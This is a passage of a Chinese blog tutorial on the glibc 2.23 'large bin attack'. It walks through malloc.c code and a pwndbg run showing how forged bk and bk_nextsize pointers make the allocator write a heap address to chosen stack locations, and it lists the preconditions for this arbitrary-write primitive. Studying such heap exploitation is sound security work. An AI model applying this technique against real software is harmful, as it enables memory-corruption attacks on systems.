<h3 id="制定P2和P3两个large-chunk的fd-nextsize和bk-nextsize，修改stack-var2的内容"><a href="#制定P2和P3两个large-chunk的fd-nextsize和bk-nextsize，修改stack-var2的内容" class="headerlink" title="制定P2和P3两个large chunk的fd_nextsize和bk_nextsize，修改stack_var2的内容"></a>制定P2和P3两个large chunk的fd_nextsize和bk_nextsize，修改stack_var2的内容</h3><p>从unsorted bin中拿出P3的时候，首先会判断P3应该归属的bin的类型，这里根据size判断出是large bin。由于large chunk的数据结构是带有fd_nextsize和bk_nextsize的，且large bin中已经存在了P2这个块，所以首先需要进行比较两个large chunk的大小，并根据大小情况制定两个large chunk的fd_nextsize、bk_nextsize、fd、bk的指针。在2.23的glibc中的malloc.c文件中，比较的过程如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">while</span> ((<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) size &lt; fwd-&gt;size)<br>  &#123;<br>    fwd = fwd-&gt;fd_nextsize;<br>    assert ((fwd-&gt;size &amp; NON_MAIN_ARENA) == <span class="hljs-number">0</span>);<br>  &#125;<br><br></code></pre></td></tr></table></figure>
<p>large bin中的chunk如果index相同的情况下，是按照由大到小的顺序排列的。也就是说index相同的情况下size越小的chunk，越接近large bin。这段代码就是遍历比较P3_size &lt; P2_size的过程，我们只看while循环中的条件即可，这里的条件是当前从unsorted bin中拿出的chunk的size是否小于large bin中前一个被释放chunk的size，如果小于，则执行while循环中的流程。(重点)但由于P2的size被我们修改成了0x3f0(重点)，P3的size为0x410，P3_size &gt; P2_size，所以不执行while循环中的代码，直接进入接下来的判断</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">if</span> ((<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) size == (<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) fwd-&gt;size)<br>  <span class="hljs-comment">/* Always insert in the second position.  */</span><br>  fwd = fwd-&gt;fd;<br></code></pre></td></tr></table></figure>
<p>前一个判断的是P3_size &lt; P2_size的情况，那么接下来判断的就是P3_size &#x3D;&#x3D; P2_size的情况，很显然也不是，所以这条if判断也不执行</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">else</span><br>  &#123;<br>    victim-&gt;fd_nextsize = fwd;<br>    victim-&gt;bk_nextsize = fwd-&gt;bk_nextsize;<br>    fwd-&gt;bk_nextsize = victim;<br>    victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;<br>  &#125;<br>bck = fwd-&gt;bk;<br></code></pre></td></tr></table></figure>
<p>那么就只剩下一种情况了，就是比较P3_size &gt; P2_size的情况下执行上图中的内容，else中执行的就是将P3插入large bin中并制定P2和P3两个large chunk的fd_nextsize和bk_nextsize的过程。这里我们先不着急解释代码，回顾一下前面修改P2结构内容的情况：</p>
<ul>
<li><code>P2-&gt;bk-&gt;fd = stack_var1_addr</code>（P2的fd指向的堆块的fd指向的是stack_var1的地址）</li>
<li><code>P2-&gt;bk_nextsize-&gt;fd_nextsize = stack_var2_addr</code>（P2的bk_nextsize指向的堆块的fd_nextsize指向的是stack_var2的地址）</li>
</ul>
<p>来说一下人话：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">else</span><br>  &#123;<br>    victim-&gt;fd_nextsize = fwd; <span class="hljs-comment">//P3的fd_nextsize要修改成P2的头指针</span><br>    victim-&gt;bk_nextsize = fwd-&gt;bk_nextsize; <span class="hljs-comment">//P3的bk_nextsize要修改成P2的bk_nextsize指向的地址</span><br>    fwd-&gt;bk_nextsize = victim; <span class="hljs-comment">//P2的bk_nextsize要修改成P3的头指针</span><br>    victim-&gt;bk_nextsize-&gt;fd_nextsize = victim; <span class="hljs-comment">//P3的bk_nextsize所指向的堆块的fd_nextsize要修改成P3的头指针</span><br>  &#125;<br>bck = fwd-&gt;bk; <span class="hljs-comment">//bck等于P2的bk</span><br></code></pre></td></tr></table></figure>

<p>那么这里就像是做一个二元一次方程组一样，已知条件为：</p>
<ul>
<li>P2-&gt;bk_nextsize-&gt;fd_nextsize &#x3D; stack_var2_addr</li>
<li>P3-&gt;bk_nextsize &#x3D; P2-&gt;bk_nextsize</li>
<li>P3-&gt;bk_nextsize-&gt;fd_nextsize &#x3D; P3</li>
</ul>
<p>那么就可以导出结论：stack_var2的值 &#x3D; P3头指针（），所以stack_var2变量中的内容就被修改成了P3的头指针。</p>
<h3 id="制定P2和P3两个large-chunk的fd和bk，修改stack-var1的内容"><a href="#制定P2和P3两个large-chunk的fd和bk，修改stack-var1的内容" class="headerlink" title="制定P2和P3两个large chunk的fd和bk，修改stack_var1的内容"></a>制定P2和P3两个large chunk的fd和bk，修改stack_var1的内容</h3><p>在执行完对P3和P2的fd_nextsize和bk_nextsize的制定之后，还需要对两个large chunk的fd和bk进行制定：<br>注：bck是P2的bk指针，victim是P3的头指针</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c">mark_bin (av, victim_index);<br>victim-&gt;bk = bck; <span class="hljs-comment">// P3的bk指针要等于P2的bk指针</span><br>victim-&gt;fd = fwd; <span class="hljs-comment">// P3的fd指针要等于P2的头指针</span><br>fwd-&gt;bk = victim; <span class="hljs-comment">// P2的bk指针要等于P3的头指针</span><br>bck-&gt;fd = victim; <span class="hljs-comment">// P2的bk指针指向的堆块的fd指针要等于P3的头指针</span><br><br></code></pre></td></tr></table></figure>
<p>那么这依然还是一个二元一次方程组，已知条件为：</p>
<ul>
<li>P2-&gt;bk-&gt;fd &#x3D; stack_var1_addr</li>
<li>P2-&gt;bk-&gt;fd &#x3D; P3</li>
</ul>
<p>那么即可的出结论stack_var1的值 &#x3D; P3的头指针，所以stack_var1的值在这个流程中被修改成了P3的头指针</p>
<h3 id="查看修改结果"><a href="#查看修改结果" class="headerlink" title="查看修改结果"></a>查看修改结果</h3><p>最后我们将直接运行程序至结束，再一次查看一下此时stack_var1和stack_var2中的值</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">c</span><br>Continuing.<br>stack_var1 (0x7fff88da8bb8): 0x137937a0<br>stack_var2 (0x7fff88da8bc0): 0x137937a0<br>[Inferior 1 (process 540) exited normally]<br><span class="hljs-meta prompt_">pwndbg&gt;</span><br></code></pre></td></tr></table></figure>
<p>可以看到此时stack_var1和stack_var2中的值已经被修改成了P3的头指针0x137937a0</p>
<h2 id="Large-Bin-Attack利用条件"><a href="#Large-Bin-Attack利用条件" class="headerlink" title="Large Bin Attack利用条件"></a>Large Bin Attack利用条件</h2><ul>
<li>可以修改一个large bin chunk的data</li>
<li>从unsorted bin中来的large bin chunk要紧跟在被构造过的chunk的后面</li>
</ul>
<p>满足这两个条件后，我们就能让glibc向攻击者指定的任意地址，写入一个堆地址（通常是chunk的地址），而一旦我们能控制某个地址的内容，接着我们在那里伪造一个chunk，进而触发后续的漏洞利用链。</p>
<p>malloc.c中从unsorted bin中摘除chunk完整过程代码：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><code class="hljs shell">/* remove from unsorted list */<br>unsorted_chunks (av)-&gt;bk = bck;<br><span class="hljs-meta prompt_">bck-&gt;</span><span class="language-bash">fd = unsorted_chunks (av);</span><br><br>/* Take now instead of binning if exact fit */<br><br>if (size == nb)<br>  &#123;<br>    set_inuse_bit_at_offset (victim, size);<br>    if (av != &amp;main_arena)<br>      victim-&gt;size |= NON_MAIN_ARENA;<br>    check_malloced_chunk (av, victim, nb);<br>    void *p = chunk2mem (victim);<br>    alloc_perturb (p, bytes);<br>    return p;<br>  &#125;<br><br>/* place chunk in bin */<br><br>if (in_smallbin_range (size))<br>  &#123;<br>    victim_index = smallbin_index (size);<br>    bck = bin_at (av, victim_index);<br>    fwd = bck-&gt;fd;<br>  &#125;<br>else<br>  &#123;<br>    victim_index = largebin_index (size);<br>    bck = bin_at (av, victim_index);<br>    fwd = bck-&gt;fd;<br><br>    /* maintain large bins in sorted order */<br>    if (fwd != bck)<br>      &#123;<br>        /* Or with inuse bit to speed comparisons */<br>        size |= PREV_INUSE;<br>        /* if smaller than smallest, bypass loop below */<br>        assert ((bck-&gt;bk-&gt;size &amp; NON_MAIN_ARENA) == 0);<br>        if ((unsigned long) (size) &lt; (unsigned long) (bck-&gt;bk-&gt;size))<br>          &#123;<br>            fwd = bck;<br>            bck = bck-&gt;bk;<br><br>            victim-&gt;fd_nextsize = fwd-&gt;fd;<br>            victim-&gt;bk_nextsize = fwd-&gt;fd-&gt;bk_nextsize;<br>            fwd-&gt;fd-&gt;bk_nextsize = victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;<br>          &#125;<br>        else<br>          &#123;<br>            assert ((fwd-&gt;size &amp; NON_MAIN_ARENA) == 0);<br>            while ((unsigned long) size &lt; fwd-&gt;size)<br>              &#123;<br>                fwd = fwd-&gt;fd_nextsize;<br>                assert ((fwd-&gt;size &amp; NON_MAIN_ARENA) == 0);<br>              &#125;<br><br>            if ((unsigned long) size == (unsigned long) fwd-&gt;size)<br>              /* Always insert in the second position.  */<br>              fwd = fwd-&gt;fd;<br>            else<br>              &#123;<br>                victim-&gt;fd_nextsize = fwd;<br>                victim-&gt;bk_nextsize = fwd-&gt;bk_nextsize;<br>                fwd-&gt;bk_nextsize = victim;<br>                victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;<br>              &#125;<br>            bck = fwd-&gt;bk;<br>          &#125;<br>      &#125;<br>    else<br>      victim-&gt;fd_nextsize = victim-&gt;bk_nextsize = victim;<br>  &#125;<br><br>mark_bin (av, victim_index);<br><span class="hljs-meta prompt_">victim-&gt;</span><span class="language-bash">bk = bck;</span><br><span class="hljs-meta prompt_">victim-&gt;</span><span class="language-bash">fd = fwd;</span><br><span class="hljs-meta prompt_">fwd-&gt;</span><span class="language-bash">bk = victim;</span><br><span class="hljs-meta prompt_">bck-&gt;</span><span class="language-bash">fd = victim;</span><br><br></code></pre></td></tr></table></figure>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Heap/" class="category-chain-item">Heap</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Pwn/" class="print-no-link">#Pwn</a>
      
        <a href="/tags/Heap/" class="print-no-link">#Heap</a>
      
        <a href="/tags/Large-Bin-Attack/" class="print-no-link">#Large Bin Attack</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Linux Heap PWN：Large Bin Attack</div>
      <div>https://zheng-hailin.github.io/2026/04/06/largebin-attack/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Hailin Zheng</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年4月6日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2026年5月30日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/04/11/kernel-basic-knowledge/" title="Linux Kernel Pwn：Basic Knowledge">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Linux Kernel Pwn：Basic Knowledge</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/04/06/unsortedbin-attack/" title="Linux Heap PWN：Unsorted Bin Attack">
                        <span class="hidden-mobile">Linux Heap PWN：Unsorted Bin Attack</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
    <div id="giscus" class="giscus"></div>
    <script type="text/javascript">
      Fluid.utils.loadComments('#giscus', function() {
        var options = {"repo":"zer0ptr/zer0ptr.github.io","repo-id":"R_kgDOQ7_WQA","category":"Q&A","category-id":"DIC_kwDOQ7_WQM4C1Wz3","theme-light":"light","theme-dark":"dark","mapping":"pathname","reactions-enabled":1,"emit-metadata":0,"input-position":"top","lang":"zh-CN"};
        var attributes = {};
        for (let option in options) {
          if (!option.startsWith('theme-')) {
            var key = option.startsWith('data-') ? option : 'data-' + option;
            attributes[key] = options[option];
          }
        }
        var light = 'light';
        var dark = 'dark';
        window.GiscusThemeLight = light;
        window.GiscusThemeDark = dark;
        attributes['data-theme'] = document.documentElement.getAttribute('data-user-color-scheme') === 'dark' ? dark : light;
        for (let attribute in attributes) {
          var value = attributes[attribute];
          if (value === undefined || value === null || value === '') {
            delete attributes[attribute];
          }
        }
        var s = document.createElement('script');
        s.setAttribute('src', 'https://giscus.app/client.js');
        s.setAttribute('crossorigin', 'anonymous');
        for (let attribute in attributes) {
          s.setAttribute(attribute, attributes[attribute]);
        }
        var ss = document.getElementsByTagName('script');
        var e = ss.length > 0 ? ss[ss.length - 1] : document.head || document.documentElement;
        e.parentNode.insertBefore(s, e.nextSibling);
      });
    </script>
    <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  









    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <br> <a href="https://icp.gov.moe/?keyword=20260320" target="_blank" rel="noopener nofollow">萌ICP备20260320号</a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    function isExpandAllEnabled() {
      return CONFIG.toc && CONFIG.toc.expand_all === true;
    }
    function expandAllToc() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .tocbot-is-collapsed').removeClass('tocbot-is-collapsed');
    }
    function updateTocToggle($li, $childList) {
      var $toggle = $li.children('.toc-toggle');
      if ($toggle.length === 0) { return; }
      var collapsed = $childList.hasClass('tocbot-is-collapsed');
      $toggle
        .toggleClass('toc-toggle-collapsed', collapsed)
        .toggleClass('toc-toggle-expanded', !collapsed);
    }
    function bindTocToggle() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .toc-list-item').each(function() {
        var $li = jQuery(this);
        var $childList = $li.children('ol');
        if ($childList.length === 0) {
          if ($li.children('.toc-toggle').length === 0) {
            $li.prepend('<span class="toc-toggle toc-toggle-placeholder" aria-hidden="true">›</span>');
          }
          return;
        }

        if ($li.children('.toc-toggle').length === 0) {
          $li.prepend('<span class="toc-toggle toc-toggle-expanded" aria-hidden="true">›</span>');
        }
        updateTocToggle($li, $childList);
      });
      jQuery('#toc-body').off('click.tocToggle').on('click.tocToggle', '.toc-toggle', function(e) {
        e.preventDefault();
        e.stopPropagation();
        var $li = jQuery(this).parent('.toc-list-item');
        var $childList = $li.children('ol');
        if ($childList.length === 0) { return; }
        $childList.toggleClass('tocbot-is-collapsed');
        updateTocToggle($li, $childList);
      });
      if (!window.__tocToggleObserver) {
        window.__tocToggleObserver = new MutationObserver(function(mutations) {
          mutations.forEach(function(mutation) {
            if (mutation.type !== 'attributes' || mutation.attributeName !== 'class') { return; }
            var $list = jQuery(mutation.target);
            var $li = $list.parent('.toc-list-item');
            if ($li.length === 0) { return; }
            updateTocToggle($li, $list);
          });
        });
        jQuery('#toc-body ol').each(function() {
          window.__tocToggleObserver.observe(this, { attributes: true });
        });
      }
    }
    var tocConfig = Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc);
    if (isExpandAllEnabled()) {
      tocConfig.collapseDepth = 6;
    }
    window.tocbot.init(tocConfig);
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
    expandAllToc();
    bindTocToggle();

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
        expandAllToc();
        bindTocToggle();
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  
      <script>
        if (!window.MathJax) {
          window.MathJax = {
            tex    : {
              inlineMath: { '[+]': [['$', '$']] }
            },
            loader : {
              load: ['ui/lazy']
            },
            options: {
              renderActions: {
                insertedScript: [200, () => {
                  document.querySelectorAll('mjx-container').forEach(node => {
                    let target = node.parentNode;
                    if (target.nodeName.toLowerCase() === 'li') {
                      target.parentNode.classList.add('has-jax');
                    }
                  });
                }, '', false]
              }
            }
          };
        } else {
          MathJax.startup.document.state(0);
          MathJax.texReset();
          MathJax.typeset();
          MathJax.typesetPromise();
        }

        Fluid.events.registerRefreshCallback(function() {
          if ('MathJax' in window && MathJax.startup.document && typeof MathJax.startup.document.state === 'function') {
            MathJax.startup.document.state(0);
            MathJax.texReset();
            MathJax.typeset();
            MathJax.typesetPromise();
          }
        });
      </script>
    

  <script  src="https://lib.baomitu.com/mathjax/3.2.2/es5/tex-mml-chtml.js" ></script>

  <script defer src="/js/openkounter.js" ></script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="/js/love.js"></script>
<script src="/js/sakura.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
